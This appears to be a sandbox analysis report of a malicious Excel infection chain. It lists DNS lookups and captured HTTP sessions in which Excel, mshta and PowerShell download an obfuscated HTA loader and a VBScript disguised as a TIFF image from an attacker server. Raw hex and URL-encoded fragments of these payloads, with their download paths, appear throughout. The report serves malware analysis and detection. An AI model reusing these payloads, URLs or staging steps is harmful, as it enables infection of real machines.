Dec 12, 2024 21:43:20.850251913 CET	8.8.8.8	192.168.2.22	0x515c	No error (0)	jktc.pro		104.21.34.183	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:20.850251913 CET	8.8.8.8	192.168.2.22	0x515c	No error (0)	jktc.pro		172.67.163.184	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:20.985182047 CET	8.8.8.8	192.168.2.22	0x515c	No error (0)	jktc.pro		172.67.163.184	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:20.985182047 CET	8.8.8.8	192.168.2.22	0x515c	No error (0)	jktc.pro		104.21.34.183	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:21.226619959 CET	8.8.8.8	192.168.2.22	0x515c	No error (0)	jktc.pro		104.21.34.183	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:21.226619959 CET	8.8.8.8	192.168.2.22	0x515c	No error (0)	jktc.pro		172.67.163.184	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:21.360857964 CET	8.8.8.8	192.168.2.22	0x515c	No error (0)	jktc.pro		104.21.34.183	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:21.360857964 CET	8.8.8.8	192.168.2.22	0x515c	No error (0)	jktc.pro		172.67.163.184	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:37.205759048 CET	8.8.8.8	192.168.2.22	0xe4ef	No error (0)	res.cloudinary.com	ion.cloudinary.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 21:43:37.464428902 CET	8.8.8.8	192.168.2.22	0x232f	No error (0)	res.cloudinary.com	resc.cloudinary.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 21:43:55.299524069 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.97.6	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.299524069 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.96.6	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.433954954 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.96.6	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.433954954 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.97.6	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.676904917 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.97.6	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.676904917 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.96.6	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.811922073 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.96.6	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.811922073 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.97.6	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.947534084 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.96.6	A (IP address)	IN (0x0001)	false
Dec 12, 2024 21:43:55.947534084 CET	8.8.8.8	192.168.2.22	0x20ee	No error (0)	paste.ee		188.114.97.6	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jktc.pro

107.172.44.175

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	107.172.44.175	80	3584	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 21:43:18.965543985 CET	390	OUT	GET /73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 107.172.44.175 Connection: Keep-Alive
Dec 12, 2024 21:43:20.077370882 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 20:43:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Thu, 12 Dec 2024 09:19:08 GMT ETag: "14278-6290f34dfc8a9" Accept-Ranges: bytes Content-Length: 82552 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 34 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 32 37 25 34 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 37 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 34 38 25 35 34 25 34 44 25 34 43 25 32 30 25 34 35 25 36 45 25 36 33 25 37 32 25 37 39 25 37 30 25 37 34 25 36 39 25 36 46 25 36 45 25 32 30 25 37 30 25 37 32 25 36 46 25 37 36 25 36 39 25 36 34 25 36 35 25 36 34 25 32 30 25 36 32 25 37 39 25 32 30 25 37 34 25 37 35 25 36 36 25 36 31 25 37 34 25 32 45 25 36 33 25 36 46 25 36 44 25 32 30 25 32 44 25 32 [TRUNCATED] Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%70%72%6F%76%69%64%65%64%20%62%79%20%74%75%66%61%74%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%32%31%25%34%34%25%34%46%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%36%38%25%37%34%25%36%44%25%36%43%25%33%45%25%30%41%25%33%43%25%36%44%25%36%35%25%37%34%25%36%31%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%32%44%25%36%35%25%37%31%25%37%35%25%36%39%25%37%36%25%33%44%25%32%32%25%35%38%25%32%44%25%35%35%25%34%31%25%32%44%25%34%33%25%36%46%25%36%44%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%43%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%3
Dec 12, 2024 21:43:20.077400923 CET	1236	IN	Data Raw: 36 25 34 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 36 25 33 35 25 32 35 25 33 36 25 34 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 33 25 34 34 25 32 35 25 33 32 25 33 32 25 32 35 25 33 34 25 33 39 25 32 35 25 33 34 25 33 35 25 32 35 25 33 33 Data Ascii: 6%45%25%37%34%25%36%35%25%36%45%25%37%34%25%33%44%25%32%32%25%34%39%25%34%35%25%33%44%25%34%35%25%36%44%25%37%35%25%36%43%25%36%31%25%37%34%25%36%35%25%34%39%25%34%35%25%33%38%25%32%32%25%32%30%25%33%45%25%30%41%25%33%43%25%36%38%25%37%34%25%3
Dec 12, 2024 21:43:20.077411890 CET	1236	IN	Data Raw: 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 Data Ascii: 9%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%3
Dec 12, 2024 21:43:20.077724934 CET	1236	IN	Data Raw: 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 Data Ascii: 5%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%2
Dec 12, 2024 21:43:20.077737093 CET	896	IN	Data Raw: 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 Data Ascii: 0%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%3
Dec 12, 2024 21:43:20.077743053 CET	1236	IN	Data Raw: 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 Data Ascii: 25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%
Dec 12, 2024 21:43:20.077747107 CET	1236	IN	Data Raw: 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 Data Ascii: 30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%
Dec 12, 2024 21:43:20.078603983 CET	1236	IN	Data Raw: 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 Data Ascii: 39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%
Dec 12, 2024 21:43:20.078618050 CET	1236	IN	Data Raw: 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 Data Ascii: 25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%
Dec 12, 2024 21:43:20.078629017 CET	1236	IN	Data Raw: 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 Data Ascii: 30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%
Dec 12, 2024 21:43:20.197633028 CET	1236	IN	Data Raw: 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 Data Ascii: 39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49164	107.172.44.175	80	3916	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 21:43:23.506968975 CET	467	OUT	GET /73/ycc/goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta HTTP/1.1 Accept: / Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Range: bytes=8897- Connection: Keep-Alive Host: 107.172.44.175 If-Range: "14278-6290f34dfc8a9"
Dec 12, 2024 21:43:24.722567081 CET	1236	IN	HTTP/1.1 206 Partial Content Date: Thu, 12 Dec 2024 20:43:24 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Thu, 12 Dec 2024 09:19:08 GMT ETag: "14278-6290f34dfc8a9" Accept-Ranges: bytes Content-Length: 73655 Content-Range: bytes 8897-82551/82552 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 [TRUNCATED] Data Ascii: 5%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25
Dec 12, 2024 21:43:24.722632885 CET	1236	IN	Data Raw: 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 Data Ascii: %30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%33%44%25%30%39%25%30%39%25
Dec 12, 2024 21:43:24.722671032 CET	448	IN	Data Raw: 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 Data Ascii: %39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%36%33%25%37%32%25%36%35%25%34%31%25%35%34%25%36%35%25%34%46%25%34%32%25%34%41%25%34%35%25%36%33%25%35%34%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30
Dec 12, 2024 21:43:24.722704887 CET	1236	IN	Data Raw: 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 Data Ascii: 30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%
Dec 12, 2024 21:43:24.722742081 CET	1236	IN	Data Raw: 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 Data Ascii: 39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%
Dec 12, 2024 21:43:24.723201990 CET	1236	IN	Data Raw: 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 Data Ascii: 25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%
Dec 12, 2024 21:43:24.723238945 CET	1236	IN	Data Raw: 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 Data Ascii: 30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%
Dec 12, 2024 21:43:24.723273993 CET	1236	IN	Data Raw: 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 Data Ascii: 39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%
Dec 12, 2024 21:43:24.723309040 CET	1236	IN	Data Raw: 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 Data Ascii: 25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%
Dec 12, 2024 21:43:24.723893881 CET	1236	IN	Data Raw: 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 Data Ascii: 30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%
Dec 12, 2024 21:43:24.843123913 CET	1236	IN	Data Raw: 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 39 25 32 35 25 33 30 25 33 Data Ascii: 39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%39%25%30%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49165	107.172.44.175	80	4064	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 21:43:29.951836109 CET	372	OUT	GET /73/simplecookiebiscutwithsweetnessforentiretime.tIF HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 107.172.44.175 Connection: Keep-Alive
Dec 12, 2024 21:43:31.051784992 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 20:43:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Thu, 12 Dec 2024 09:11:54 GMT ETag: "25ac8-6290f1af9d279" Accept-Ranges: bytes Content-Length: 154312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 4c 00 4c 00 4b 00 71 00 7a 00 69 00 69 00 66 00 69 00 55 00 47 00 57 00 69 00 73 00 4b 00 20 00 3d 00 20 00 22 00 67 00 63 00 75 00 4e 00 70 00 61 00 70 00 70 00 69 00 71 00 66 00 7a 00 6c 00 78 00 6e 00 22 00 0d 00 0a 00 50 00 68 00 55 00 6d 00 66 00 68 00 4e 00 6a 00 53 00 68 00 70 00 76 00 57 00 6b 00 6d 00 20 00 3d 00 20 00 22 00 61 00 4b 00 66 00 4b 00 66 00 68 00 69 00 5a 00 4f 00 74 00 6e 00 70 00 70 00 61 00 5a 00 22 00 0d 00 0a 00 47 00 4c 00 75 00 4b 00 53 00 47 00 69 00 78 00 63 00 63 00 57 00 4b 00 55 00 51 00 57 00 20 00 3d 00 20 00 22 00 57 00 63 00 68 00 50 00 7a 00 65 00 4b 00 73 00 50 00 4c 00 69 00 5a 00 4b 00 68 00 4e 00 22 00 0d 00 0a 00 0d 00 0a 00 57 00 4c 00 54 00 43 00 57 00 64 00 55 00 70 00 55 00 47 00 4e 00 4b 00 57 00 68 00 75 00 20 00 3d 00 20 00 22 00 55 00 65 00 57 00 4c 00 7a 00 52 00 6a 00 75 00 4b 00 4c 00 61 00 6e 00 41 00 75 00 69 00 22 00 0d 00 0a 00 57 00 78 00 47 00 6e 00 65 00 57 00 5a 00 52 00 55 00 41 00 [TRUNCATED] Data Ascii: LLKqziifiUGWisK = "gcuNpappiqfzlxn"PhUmfhNjShpvWkm = "aKfKfhiZOtnppaZ"GLuKSGixccWKUQW = "WchPzeKsPLiZKhN"WLTCWdUpUGNKWhu = "UeWLzRjuKLanAui"WxGneWZRUAWkKfW = "LtpNLZkChNdiqWi"kLmcWJKGJcLkPbv = "zAfWeNoKIdWkfRK"ALecPePuceseWaN = "dZjAsufKNosKioi"GeilzcBNqrzSeqd = "ioKWrLPvmqoLjHz"nhdWSGczPWWlicW = "gkLauKWmWfkgvuL"AxGeAjeWfPKbAmp = "WnGWWKKoKKxKiIz"bLLhiKkgoKbboIb = "jGWeIKNnpJmKhUL"AGPSUifWmLooLKn = "GkLZAzUGxeUUvLN"NmGgpi
